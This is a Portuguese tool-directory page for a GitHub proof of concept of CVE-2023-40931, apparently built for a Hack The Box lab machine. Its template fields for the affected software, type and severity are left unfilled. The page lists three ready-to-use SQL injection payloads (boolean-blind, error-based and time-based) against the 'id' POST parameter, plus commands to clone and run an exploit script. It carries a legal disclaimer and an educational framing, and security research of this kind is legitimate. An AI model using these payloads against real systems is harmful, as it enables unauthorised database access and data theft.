Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/g4sp4rcs/cve-2023-40931-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubg4sp4rcs/cve-2023-40931-poc

CVE-2023-40931-POC

Prova de Conceito do CVE-2023-40931 feita para o HTB MONITORED

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-40931 Prova de Conceito (PoC) 🚨

Este repositório contém uma Prova de Conceito (PoC) para a CVE-2023-40931, uma vulnerabilidade de segurança identificada em [software/sistema afetado]. O objetivo deste repositório é demonstrar a vulnerabilidade apenas para fins educacionais e de pesquisa. 🛠️

Aviso Legal ⚠️

Este projeto destina-se apenas a fins educacionais e testes autorizados. O uso indevido deste código pode resultar em consequências legais. Os autores não são responsáveis por qualquer uso indevido ou dano causado por este código. Sempre obtenha a devida autorização antes de testar qualquer sistema. 🔒

Detalhes 📋

  • CVE ID: CVE-2023-40931
  • Tipo de Vulnerabilidade: [Tipo de vulnerabilidade, ex.: Execução Remota de Código, Escalação de Privilégios]
  • Software Afetado: [Nome e versão do software afetado]
  • Severidade: [Nível de severidade, ex.: Crítico, Alto] 🚩

Para mais informações, consulte a entrada oficial da CVE: CVE-2023-40931. 🔗

Uso 🚀

  1. Clone o repositório:

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2023-40931-POC.git
    cd CVE-2023-40931-POC
    python3 exploit.py
    

O parâmetro POST 'id' é vulnerável. Os seguintes payloads exploraram com sucesso a vulnerabilidade:

  • Injeção cega baseada em booleanos: Este payload utiliza uma instrução condicional para determinar o valor lógico de uma consulta, permitindo a extração de dados por meio de lógica booleana.

    • Payload: action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2064=2064) THEN 3 ELSE (SELECT 4367 UNION SELECT 3803) END))
  • Injeção baseada em erros: Este payload explora mensagens de erro do banco de dados para extrair informações ao acionar erros específicos.

    • Payload: action=acknowledge_banner_message&id=3 OR (SELECT 9867 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9867=9867,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
  • Injeção cega baseada em tempo: Este payload utiliza atrasos de tempo para inferir informações ao observar o tempo de resposta do servidor.

    • Payload: action=acknowledge_banner_message&id=3 AND (SELECT 9475 FROM (SELECT(SLEEP(5)))Robc)

Esses payloads demonstram a suscetibilidade da vulnerabilidade a ataques de injeção de SQL. Prossiga com cautela e garanta a devida autorização antes de testar. 🔒

  • Siga as instruções no arquivo exploit.py para executar a PoC. 🧑‍💻

    Nota: Certifique-se de ter as dependências necessárias instaladas. ✅

  • Baixar ferramenta